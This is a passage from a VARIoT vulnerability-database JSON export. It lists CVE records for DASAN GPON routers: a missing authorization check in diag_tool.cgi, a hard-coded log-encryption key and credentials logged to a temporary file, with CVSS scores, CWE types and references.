"id": "JVNDB-2017-012245"
},
{
"date": "2018-01-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201801-811"
},
{
"date": "2024-11-21T03:19:14.607000",
"db": "NVD",
"id": "CVE-2017-18046"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201801-811"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dasan GPON ONT WiFi Router H640X Device buffer error vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-012245"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201801-811"
}
],
"trust": 0.6
}
}
VAR-201904-0121
Vulnerability from variot - Updated: 2024-11-23 22:12
diag_tool.cgi on DASAN H660RM GPON routers with firmware 1.03-0022 lacks any authorization check, which allows remote attackers to run a ping command via a GET request to enumerate LAN devices or crash the router with a DoS attack. There is an authorization vulnerability in the DASAN H660RM GPON router firmware. Information may be obtained, and the service may be put into a denial-of-service (DoS) state. DASAN H660RM is a GPON optical network terminal produced by the Korean company DASAN. There is an authorization vulnerability in the diag_tool.cgi file in DASAN H660RM with firmware version 1.03-0022. This vulnerability stems from the lack of authentication measures or insufficient authentication strength in network systems or products.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201904-0121",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "h660rm",
"scope": "eq",
"trust": 1.0,
"vendor": "dasannetworks",
"version": "1.03-0022"
},
{
"model": "h660rm",
"scope": "eq",
"trust": 0.8,
"vendor": "dasan",
"version": "1.03-0022"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003424"
},
{
"db": "NVD",
"id": "CVE-2019-9974"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:dasannetworks:h660rm_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003424"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Krzysztof Burghardt",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-1032"
}
],
"trust": 0.6
},
"cve": "CVE-2019-9974",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2019-9974",
"impactScore": 4.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-161409",
"impactScore": 4.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2019-9974",
"impactScore": 5.2,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-9974",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2019-9974",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNNVD",
"id": "CNNVD-201903-1032",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-161409",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-161409"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003424"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1032"
},
{
"db": "NVD",
"id": "CVE-2019-9974"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "diag_tool.cgi on DASAN H660RM GPON routers with firmware 1.03-0022 lacks any authorization check, which allows remote attackers to run a ping command via a GET request to enumerate LAN devices or crash the router with a DoS attack. There is an authorization vulnerability in the DASAN H660RM GPON router firmware. Information may be obtained, and the service may be put into a denial-of-service (DoS) state. DASAN H660RM is a GPON optical network terminal produced by the Korean company DASAN. There is an authorization vulnerability in the diag_tool.cgi file in DASAN H660RM with firmware version 1.03-0022. This vulnerability stems from the lack of authentication measures or insufficient authentication strength in network systems or products.",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-9974"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003424"
},
{
"db": "VULHUB",
"id": "VHN-161409"
}
],
"trust": 1.71
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-161409",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-161409"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-9974",
"trust": 2.5
},
{
"db": "PACKETSTORM",
"id": "152232",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003424",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1032",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-161409",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-161409"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003424"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1032"
},
{
"db": "NVD",
"id": "CVE-2019-9974"
}
]
},
"id": "VAR-201904-0121",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-161409"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-23T22:12:07.603000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.dasannetworks.com/en/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003424"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-306",
"trust": 1.1
},
{
"problemtype": "CWE-862",
"trust": 1.1
},
{
"problemtype": "CWE-285",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-161409"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003424"
},
{
"db": "NVD",
"id": "CVE-2019-9974"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://blog.burghardt.pl/2019/03/diag_tool-cgi-on-dasan-h660rm-devices-with-firmware-1-03-0022-allows-spawning-ping-processes-without-any-authorization-leading-to-information-disclosure-and-dos-attacks/"
},
{
"trust": 2.3,
"url": "http://packetstormsecurity.com/files/152232/dasan-h660rm-information-disclosure-hardcoded-key.html"
},
{
"trust": 1.7,
"url": "https://seclists.org/bugtraq/2019/mar/41"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9974"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-9974"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-161409"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003424"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1032"
},
{
"db": "NVD",
"id": "CVE-2019-9974"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-161409"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003424"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1032"
},
{
"db": "NVD",
"id": "CVE-2019-9974"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-04-11T00:00:00",
"db": "VULHUB",
"id": "VHN-161409"
},
{
"date": "2019-05-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-003424"
},
{
"date": "2019-03-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201903-1032"
},
{
"date": "2019-04-11T19:29:01.503000",
"db": "NVD",
"id": "CVE-2019-9974"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-08-24T00:00:00",
"db": "VULHUB",
"id": "VHN-161409"
},
{
"date": "2019-05-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-003424"
},
{
"date": "2020-10-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201903-1032"
},
{
"date": "2024-11-21T04:52:42.743000",
"db": "NVD",
"id": "CVE-2019-9974"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-1032"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "DASAN H660RM GPON Authorization vulnerability in router firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003424"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "access control error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-1032"
}
],
"trust": 0.6
}
}
VAR-201904-0122
Vulnerability from variot - Updated: 2024-11-23 22:12
DASAN H660RM devices with firmware 1.03-0022 use a hard-coded key for log encryption. Data stored using this key can be decrypted by anyone able to access this key. DASAN H660RM is a GPON optical network terminal produced by DASAN of Korea. A trust management vulnerability exists in DASAN H660RM with firmware version 1.03-0022. This vulnerability stems from the lack of an effective trust management mechanism in network systems or products. Attackers can use default passwords, hard-coded passwords, hard-coded certificates, etc. to attack affected components. Because the key is built into the firmware, the encryption should not be relied on to keep stored or exported logs confidential; the patch entry in this record links only to the vendor's top page, not to a specific fixed firmware release.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201904-0122",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "h660rm",
"scope": "eq",
"trust": 1.0,
"vendor": "dasannetworks",
"version": "1.03-0022"
},
{
"model": "h660rm",
"scope": "eq",
"trust": 0.8,
"vendor": "dasan",
"version": "1.03-0022"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003423"
},
{
"db": "NVD",
"id": "CVE-2019-9975"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:dasannetworks:h660rm_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003423"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Krzysztof Burghardt",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-1030"
}
],
"trust": 0.6
},
"cve": "CVE-2019-9975",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2019-9975",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-161410",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2019-9975",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-9975",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2019-9975",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201903-1030",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-161410",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-161410"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003423"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1030"
},
{
"db": "NVD",
"id": "CVE-2019-9975"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "DASAN H660RM devices with firmware 1.03-0022 use a hard-coded key for logs encryption. Data stored using this key can be decrypted by anyone able to access this key. DASAN H660RM is a GPON optical network terminal equipment produced by Korea DASAN Company. A trust management issue vulnerability exists in DASAN H660RM with firmware version 1.03-0022. This vulnerability stems from the lack of an effective trust management mechanism in network systems or products. Attackers can use default passwords or hard-coded passwords, hard-coded certificates, etc. to attack affected components",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-9975"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003423"
},
{
"db": "VULHUB",
"id": "VHN-161410"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-9975",
"trust": 2.5
},
{
"db": "PACKETSTORM",
"id": "152232",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003423",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1030",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-161410",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-161410"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003423"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1030"
},
{
"db": "NVD",
"id": "CVE-2019-9975"
}
]
},
"id": "VAR-201904-0122",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-161410"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-23T22:12:07.577000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.dasannetworks.com/en/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003423"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-798",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-161410"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003423"
},
{
"db": "NVD",
"id": "CVE-2019-9975"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://blog.burghardt.pl/2019/03/syslog_tool-cgi-on-dasan-h660rm-devices-with-firmware-1-03-0022-uses-a-hard-coded-key-for-logs-encryption/"
},
{
"trust": 2.3,
"url": "http://packetstormsecurity.com/files/152232/dasan-h660rm-information-disclosure-hardcoded-key.html"
},
{
"trust": 1.7,
"url": "https://seclists.org/bugtraq/2019/mar/41"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9975"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-9975"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-161410"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003423"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1030"
},
{
"db": "NVD",
"id": "CVE-2019-9975"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-161410"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003423"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1030"
},
{
"db": "NVD",
"id": "CVE-2019-9975"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-04-11T00:00:00",
"db": "VULHUB",
"id": "VHN-161410"
},
{
"date": "2019-05-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-003423"
},
{
"date": "2019-03-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201903-1030"
},
{
"date": "2019-04-11T19:29:01.567000",
"db": "NVD",
"id": "CVE-2019-9975"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-04-12T00:00:00",
"db": "VULHUB",
"id": "VHN-161410"
},
{
"date": "2019-05-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-003423"
},
{
"date": "2019-04-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201903-1030"
},
{
"date": "2024-11-21T04:52:42.890000",
"db": "NVD",
"id": "CVE-2019-9975"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-1030"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "DASAN H660RM Vulnerabilities related to the use of hard-coded credentials in device firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003423"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-1030"
}
],
"trust": 0.6
}
}
VAR-201904-0123
Vulnerability from variot - Updated: 2024-11-23 22:12
The Boa server configuration on DASAN H660RM devices with firmware 1.03-0022 logs POST data to the /tmp/boa-temp file, which allows logged-in users to read the credentials of administration web interface users. The DASAN H660RM device firmware contains a vulnerability related to certificate and password management. Information may be obtained or altered, and service operation may be disrupted (DoS). DASAN H660RM is a GPON optical network terminal produced by DASAN of Korea. A trust management vulnerability exists in DASAN H660RM with firmware version 1.03-0022. This vulnerability stems from the lack of an effective trust management mechanism in network systems or products. Attackers can use default passwords, hard-coded passwords, hard-coded certificates, etc. to attack affected components. The problem types listed in this record are CWE-532 and CWE-255, and its type field is "log information leak".
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
